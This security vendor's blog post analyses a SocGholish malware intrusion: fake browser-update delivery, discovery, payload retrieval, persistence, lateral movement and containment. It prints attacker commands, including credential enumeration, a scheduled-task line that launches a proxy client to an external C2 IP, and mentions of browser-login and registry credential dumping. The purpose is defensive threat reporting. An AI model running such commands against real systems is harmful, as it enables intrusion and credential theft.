SenseOn MDR vs. SocGholish: A Technical Analysis

Written By Matthew O'Neil

This blog was written by Matthew O’Neil, SenseOn Security Analyst.

In February of 2024, SenseOn was contacted to assist with investigating suspicious activity on a customer’s estate. SenseOn analysts quickly identified a malware infection and identified the variant as SocGholish. This blog will showcase SenseOn’s detection and response capabilities against the malware and a breakdown of SocGholish’s techniques and that of the threat actor observed.

Background

Over Q1 of 2024, the threat landscape observed an uptick in activity involving the SocGholish malware variant. This trend was documented by numerous vendors and organizations, including the analysis below presented by CIS (Center for Internet Security)[1].

 

Figure 1: CIS Q1 Malware Trends

 

The variant has been attributed to the threat actor tracked as TA569, also known as Mustard Tempest, attributed by Proofpoint[2] based on victim profiles and procedures observed across intrusions. This group has also been tied to ransomware groups seen deploying their ransomware variants, such as Hive and Lockbit, following SocGholish infections. Mustard Tempest is believed to be a financially motivated group known to use SocGholish to enable and sell Initial-Access-as-a-Service (IAaaS) to paying customers. The malware also has ties to EvilCorp[3], however, given the procedures observed during this intrusion, it is more likely that this instance is an example of an unknown operator.

Attack Chain

Initial Access & Execution

This infection kept in line with the traditional SocGholish delivery method of using drive-by compromise in the form of fake Google Chrome updates[4]. Network traffic analysis using SenseOn telemetry before the infection shows the victim visiting the malicious site ‘pluralism.themancav[.]com’, after which we can see the downloading and execution of the SocGholish JavaScript loader ‘Update.js’ from the user’s Downloads folder.

This subdomain was last seen on May 14th and is not active at the time of writing. The website appears to be a half-finished WordPress site, possibly compromised and used as part of the SocGholish distribution network. 

Figure 2: Malicious WP Site

Because obfuscated JavaScript loaders are a known and common way to begin a malicious execution chain, the execution of the script triggered a SenseOn observation and raised a high-priority case. 

Unfortunately, this customer did not have SenseOn’s MDR service at the time of this incident. Therefore, SenseOn did not become involved until after being contacted by the organisation. 

 

Figure 3: JS Observation

 

Once executed, the script was seen periodically beaconing to the C2 domain ‘hjpg.members.openarmscv[.]com’ over a total of 21 HTTPS connections to retrieve additional payloads and notify the attacker of the successful infection. Approximately 8 hours and 24 minutes after the execution of ‘Update.js’, SenseOn detected malicious discovery activity, with the delay in activity potentially being used to evade detection. 

Discovery

Throughout the intrusion, SenseOn observed the execution of numerous Windows-native discovery commands to retrieve and store information about the victim's device, account and network. The attacker was seen gathering data from Chrome and Edge as well as executing the commonly seen commands below.

  • net group "domain users" /domain

  • net user [username] /domain

  • systeminfo

  • ipconfig /all

  • cmdley /list

The last command listed, ‘cmdley /list’, is a typo of the intended command ‘cmdkey /list’. This may indicate a typo in the discovery script or suggest the discovery as hands-on-keyboard activity rather than automated. Nonetheless, a number of these commands were detected by SenseOn, shown below alongside the ‘cmdley’ command from telemetry. 

 
 
 
 
 

Figures 4-5-6: Discovery

 

The results produced by these commands were redirected into ‘.tmp’ files stored at ‘C:\Users\[USER]\AppData\Local\Temp\’ such as ‘rad29332.tmp’. These discovery techniques align with previous analyses’ of SocGholish samples analysed in 2022 as reported by TrendMicro[5]. This previous analysis leans more towards discovery being automated. 

Resource Development

Following the initial discovery, additional payloads were retrieved by SocGholish from the following hosting sites, primarily interacted with using the Invoke-WebRequest PowerShell commandlet. Downloaded files were stored and named similarly to those seen during discovery (e.g. ‘rad2BA74.tmp’).

  • hjpg.members.openarmscv[.]com

  • mello-roos[.]com

  • sallassutherland[.]com

Following the connection to the first domain, ‘hjpg.members.openarmscv[.]com’, a downloaded file named ‘radD810D.tmp’ was renamed and executed as ‘da207292.js’. As a result of this execution, connections were made to the latter two locations listed above to retrieve additional files. This technique of masquerading file types using the ‘.tmp’ extension was employed heavily throughout the intrusion. 

 

Figure 7: JavaScript Observation

 

Connections to these domains were detected as malicious by SenseOn, and raised observations including the one below. 

 

Figure 8: C2 Observation

 

Additional software was installed to assist with discovery and persistence. Firstly, Python3 was downloaded and installed using Wget to ensure the functionality of the Python script implemented for persistence. This Wget command was detected as shown below. 

 

Figure 9: Python Installation Observation

 

Shortly after this installation, SenseOn also detected a PowerShell WebClient being used to download a PowerSharpPack script from Github. PowerSharp is a collection of post-exploitation PowerShell tools written in C#. This includes tools such as SauronEye for searching for password files, the SharPersist persistence toolkit, and SharpChomium used to retrieve Chromium data such as cookies and logins.

 

Figure 10: SharpChromium Observation

 

In the same command, the attacker calls on the SharpChromium tool and specifies the ‘logins’ argument to return all saved credentials that have non-empty passwords and store them in the file ‘rad90F69.tmp’. 

Persistence & C2

Shortly following the installation of Python, SenseOn observed a newer method of persistence implemented by SocGholish, also documented by ReliaQuest[6]. This method takes the form of a scheduled task set to execute a Python script every 5 minutes. Within the task, we can see arguments given to the script specifying the C2 IP address and port number. The command used to create the task is shown below. 

schtasks /create /f /tn "pypi-py" /tr "c:\programdata\py3\pythonw.exe c:\programdata\py3\a-temp.py -ip 92.118.112[.]208 -port 443" /sc minute /mo 5”

Based on previous research, the file appears to be a SOCKS5 proxy client used to provide C2 communications. 

Throughout this intrusion, numerous domains were accessed by the dropper to retrieve additional payloads, however, the primary C2 channel established was observed between the beachhead device and the server specified in the scheduled task: ‘92.118.112[.]208’. At the time of this writing, only a total of 4 VirusTotal vendors have this IP address flagged as malicious. 

Once C2 communication began, SenseOn was able to quickly detect the network traffic using SenseOn threat intelligence detections, assisting in attributing the threat to SocGholish. 

 

Figure 11: C2 Threat Intelligence Observation

 

Lateral Movement

Once the proxy client was established, the attacker was observed moving laterally to adjacent servers using RDP and executing similar discovery commands on each server. Here we can also see the ping utility used to check connectivity back to the beachhead and the internet.

  • net user [username]

  • net user [username] /domain

  • net group "domain admins" /domain

  • nltest /domain_trusts

  • quser /server:[servername]

  • ping [beachhead]

  • ping google.com

Furthermore, the attacker was observed using the ‘reg.exe’ Windows utility on multiple servers to dump credentials from registry hives using the following commands shown in endpoint telemetry below. 

 

Figure 12: Registry dumping telemetry

 

Containment & Eradication

Once SenseOn responded and confirmed the presence of malware through the analysis above, the beachhead device was isolated using SenseOn Active Response. To ensure containment, SenseOn, in collaboration with the client, also isolated several devices which had been accessed by the attacker. A selection of these devices was then reimaged and the threat was eradicated from the network.    

Following the containment and eradication of the threat, SenseOn provided enhanced monitoring for the estate by our 24/7 global SOC. This included case monitoring and threat hunts for malicious activity for a set time period after the incident.

Timeline

 
 

Conclusion

Once malware infection was confirmed by the SenseOn SOC, SenseOn was able to use Active Response to successfully assist in containing the threat by isolating numerous devices on the network. This allowed the organisation to eradicate remnants of the threat and recover the servers, as well as reimage the initially compromised device. Through this breakdown, we were able to detail SenseOn’s detection capabilities and service response to the SocGholish malware. 

SocGholish continues to prove a threat to organisations, with new samples found as recently as August 5th reported by SquiblydooBlog[7]. This sample stays consistent with our analysis, making use of obfuscated JavaScript, and this time utilising a poorly maintained religious website, ‘miraclesofeucharisticjesus[.]org’, for dropping. The site appears to be either compromised or staged for distribution.

Figure 11: Malicious SocGholish site

The extent of attacks, such as this instance, displays the need for businesses to deploy and maintain robust detection and response solutions that allow responders visibility and actionability to threats. 

IoCs

Domains

  • pluralism.themancav[.]com

  • hjpg.members.openarmscv[.]com

  • dallassutherland[.]com

  • mello-roos[.]com 

  • miraclesofeucharisticjesus[.]org

IP Addresses

  • 92.118.112[.]208

References

  1. CIS Blog: https://www.cisecurity.org/insights/blog/top-10-malware-q1-2024 

  2. Proofpoint Blog https://www.proofpoint.com/uk/blog/email-and-cloud-threats/detecting-analyzing-socgholish-attack 

  3. TrueSec Blog https://www.truesec.com/hub/blog/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies 

  4. Red Canary Thread Detection Report https://redcanary.com/threat-detection-report/threats/socgholish/ 

  5. Trend Micro Research: https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html 

  6. ReliaQuest Blog: https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/ 

  7. Malware Bazaar Sample reported by SquiblydooBlog: https://bazaar.abuse.ch/sample/546191fbae56a18d93abc82099ee355532e944fbaec50239c139144af1d42a55/ 

Matthew O'Neil
Previous

The Truth About How Generative AI Can Be Used In Cybersecurity
Next

7 Reasons Why You Need a Cybersecurity Platform